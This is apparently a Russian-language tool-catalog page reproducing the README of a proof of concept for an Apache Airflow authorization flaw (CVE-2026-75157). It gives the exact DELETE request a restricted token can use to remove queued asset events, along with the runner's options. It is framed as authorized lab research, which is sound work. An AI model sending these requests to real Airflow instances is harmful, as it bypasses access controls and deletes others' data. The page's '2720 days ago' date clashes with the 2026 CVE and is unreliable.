Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2026-75157-poc — Автономный авторизованный универсальный HTTP PoC для CVE-2026-75157 | Kitploit
Инструменты/GitHubGitHub/licitrasimone/cve-2026-75157-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование безопасности APIВеб-безопасностьТестирование на Проникновение
GitHublicitrasimone/cve-2026-75157-poc

cve-2026-75157-poc

Автономный авторизованный универсальный HTTP PoC для CVE-2026-75157

Репозиторий
2720 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-75157 PoC

Авторизованный PoC для исследования безопасности, демонстрирующий уязвимость авторизации в очереди событий Apache Airflow в версиях до 3.3.2.

Область применения

Запускайте только против экземпляра Airflow, которым вы владеете или который вам явно разрешено тестировать. Стандартный запускающий модуль отклоняет цели, не являющиеся loopback-адресами. Этот репозиторий не содержит логики сканирования, перечисления целей, закрепления в системе, кражи учётных данных или деструктивных полезных нагрузок.

Файлы

README.md
poc.py

poc.py — это универсальный HTTP-запускающий модуль, учитывающий целевую систему. Он принимает целевой URL, метод, путь, заголовки, тело, источник аутентификации и ожидаемый результат из командной строки вместо жёсткого задания хоста.

Использование

Проверка работоспособности локальной лаборатории Airflow:

python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/monitor/health \
  --method GET \
  --expect-status 200 \
  --expect-body healthy

Триггер CVE против уже подготовленного локального уязвимого экземпляра Airflow:

export AIRFLOW_POC_TOKEN='lab-only-restricted-token'
python3 poc.py \
  --target http://127.0.0.1:18080 \
  --path /api/v2/dags/cve_2026_75157_poc_dag/assets/queuedEvents \
  --method DELETE \
  --bearer-env AIRFLOW_POC_TOKEN \
  --expect-status 204

Токен должен принадлежать одноразовому субъекту с доступом на чтение DAG и доступом на удаление Assets. Ожидаемое уязвимое поведение заключается в том, что ограниченный субъект может удалить событие из очереди. Airflow 3.3.2 или более поздней версии должен отклонить тот же запрос, если у субъекта также нет доступа на редактирование DAG.

Опции

--target URL              Обязательный абсолютный HTTP(S)-адрес цели
--path PATH               Необязательный путь, присоединяемый к --target
--method METHOD           GET, POST, PUT, PATCH, DELETE, HEAD
--header 'Name: Value'    Повторяемый заголовок запроса
--bearer-env ENV          Чтение bearer-токена из ENV без его вывода
--json JSON               Тело запроса в формате JSON
--body-file FILE          Необработанное тело запроса
--expect-status STATUS    Повторяемая проверка ожидаемого статуса
--expect-body TEXT        Повторяемая проверка тела ответа
--timeout SECONDS
--no-follow-redirect
--allow-non-loopback      Явное согласие на авторизованную цель вне лаборатории

Запускающий модуль возвращает код выхода 0 при успешной проверке, 1 при ошибках области применения/транспорта/аргументов и 2 при неудачной HTTP-проверке. Значения авторизации и cookie скрываются в выводе.

Контекст уязвимости

До Airflow 3.3.2 маршруты DELETE для очереди событий проверяли ось DAG с разрешением на чтение, а не на редактирование. Исправление меняет требование авторизации DAG на разрешение уровня записи. Этот PoC отправляет реальный HTTP-запрос; он не создаёт лабораторного пользователя или фикстуру базы данных.

Ссылки

  • https://www.openwall.com/lists/oss-security/2026/09/18/1
  • https://github.com/apache/airflow/pull/71736
  • https://airflow.apache.org/docs/apache-airflow/3.3.1/howto/docker-compose/index.html
  • https://airflow.apache.org/docs/apache-airflow-providers-fab/stable/auth-manager/access-control.html
Скачать инструмент